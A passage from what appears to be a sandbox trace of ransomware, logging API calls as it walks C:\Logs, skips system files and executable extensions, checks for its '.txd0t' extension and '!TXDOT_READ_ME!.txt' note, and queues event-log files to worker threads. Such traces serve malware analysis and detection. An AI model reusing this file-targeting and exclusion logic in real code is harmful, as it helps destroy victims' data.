(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.300] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0089.317] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.317] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" [0089.317] SetEvent (hEvent=0x410) returned 1 [0089.317] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Audit.evtx", cAlternateFileName="MIE3AD~1.EVT")) returned 1 [0089.318] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2=".") returned 1 [0089.318] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="..") returned 1 [0089.318] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.318] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.318] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Audit.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" [0089.318] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Audit.evtx") returned=".evtx" [0089.318] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="bootsect.bak") returned 1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="iconcache.db") returned 1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="thumbs.db") returned -1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2=" ransomware ") returned 1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2=" ransom ") returned 1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="debug.txt") returned 1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="boot.ini") returned 1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="desktop.ini") returned 1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="autorun.inf") returned 1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="ntuser.dat") returned -1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="ntldr") returned -1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="ntdetect.com") returned -1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="bootfont.bin") returned 1 [0089.318] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.318] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Audit.evtx") returned=".evtx" [0089.318] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.318] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.335] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.335] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" [0089.335] SetEvent (hEvent=0x418) returned 1 [0089.335] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Connectivity.evtx", cAlternateFileName="MI8248~1.EVT")) returned 1 [0089.335] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2=".") returned 1 [0089.335] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="..") returned 1 [0089.335] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.335] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.335] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Connectivity.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" [0089.335] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Connectivity.evtx") returned=".evtx" [0089.335] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="bootsect.bak") returned 1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="iconcache.db") returned 1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="thumbs.db") returned -1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2=" ransomware ") returned 1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2=" ransom ") returned 1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="debug.txt") returned 1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="boot.ini") returned 1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="desktop.ini") returned 1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="autorun.inf") returned 1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="ntuser.dat") returned -1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="ntldr") returned -1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="ntdetect.com") returned -1 [0089.335] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="bootfont.bin") returned 1 [0089.336] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.336] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Connectivity.evtx") returned=".evtx" [0089.336] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.336] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0089.339] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.339] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" [0089.339] SetEvent (hEvent=0x410) returned 1 [0089.339] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Operational.evtx", cAlternateFileName="MI4B6B~1.EVT")) returned 1 [0089.339] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2=".") returned 1 [0089.339] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="..") returned 1 [0089.339] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.339] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.339] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" [0089.340] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Operational.evtx") returned=".evtx" [0089.340] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2=" ransom ") returned 1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="debug.txt") returned 1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="boot.ini") returned 1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="ntldr") returned -1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.340] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.340] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Operational.evtx") returned=".evtx" [0089.340] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.340] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.349] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.349] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" [0089.349] SetEvent (hEvent=0x408) returned 1 [0089.349] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Security.evtx", cAlternateFileName="MI7709~1.EVT")) returned 1 [0089.349] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2=".") returned 1 [0089.349] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="..") returned 1 [0089.349] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.349] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.349] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Security.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" [0089.349] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Security.evtx") returned=".evtx" [0089.349] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.349] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="bootsect.bak") returned 1 [0089.349] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="iconcache.db") returned 1 [0089.349] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="thumbs.db") returned -1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2=" ransomware ") returned 1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2=" ransom ") returned 1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="debug.txt") returned 1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="boot.ini") returned 1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="desktop.ini") returned 1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="autorun.inf") returned 1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="ntuser.dat") returned -1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="ntldr") returned -1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="ntdetect.com") returned -1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="bootfont.bin") returned 1 [0089.350] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.350] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Security.evtx") returned=".evtx" [0089.350] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.350] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.363] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.363] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" [0089.363] SetEvent (hEvent=0x418) returned 1 [0089.363] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Store%4Operational.evtx", cAlternateFileName="MICEDD~1.EVT")) returned 1 [0089.363] StrCmpW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2=".") returned 1 [0089.363] StrCmpW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="..") returned 1 [0089.363] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.363] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.363] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Store%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" [0089.363] PathFindExtensionW (pszPath="Microsoft-Windows-Store%4Operational.evtx") returned=".evtx" [0089.363] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.363] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.363] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.363] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.363] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.363] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2=" ransom ") returned 1 [0089.363] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="debug.txt") returned 1 [0089.363] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="boot.ini") returned 1 [0089.363] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.363] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.364] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.364] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="ntldr") returned -1 [0089.364] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.364] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.364] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.364] PathFindExtensionW (pszPath="Microsoft-Windows-Store%4Operational.evtx") returned=".evtx" [0089.364] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.364] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0089.369] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.369] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" [0089.369] SetEvent (hEvent=0x410) returned 1 [0089.369] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cAlternateFileName="MIE2F0~1.EVT")) returned 1 [0089.369] StrCmpW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2=".") returned 1 [0089.369] StrCmpW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="..") returned 1 [0089.369] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.369] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.369] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" [0089.369] PathFindExtensionW (pszPath="Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned=".evtx" [0089.369] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="bootsect.bak") returned 1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="iconcache.db") returned 1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="thumbs.db") returned -1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2=" ransomware ") returned 1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2=" ransom ") returned 1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="debug.txt") returned 1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="boot.ini") returned 1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="desktop.ini") returned 1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="autorun.inf") returned 1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="ntuser.dat") returned -1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="ntldr") returned -1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="ntdetect.com") returned -1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="bootfont.bin") returned 1 [0089.369] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.369] PathFindExtensionW (pszPath="Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned=".evtx" [0089.370] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.370] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0089.385] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.385] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" [0089.385] SetEvent (hEvent=0x410) returned 1 [0089.385] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cAlternateFileName="MIAB1D~1.EVT")) returned 1 [0089.385] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2=".") returned 1 [0089.385] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="..") returned 1 [0089.385] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.385] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.385] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" [0089.385] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned=".evtx" [0089.385] StrCmpW 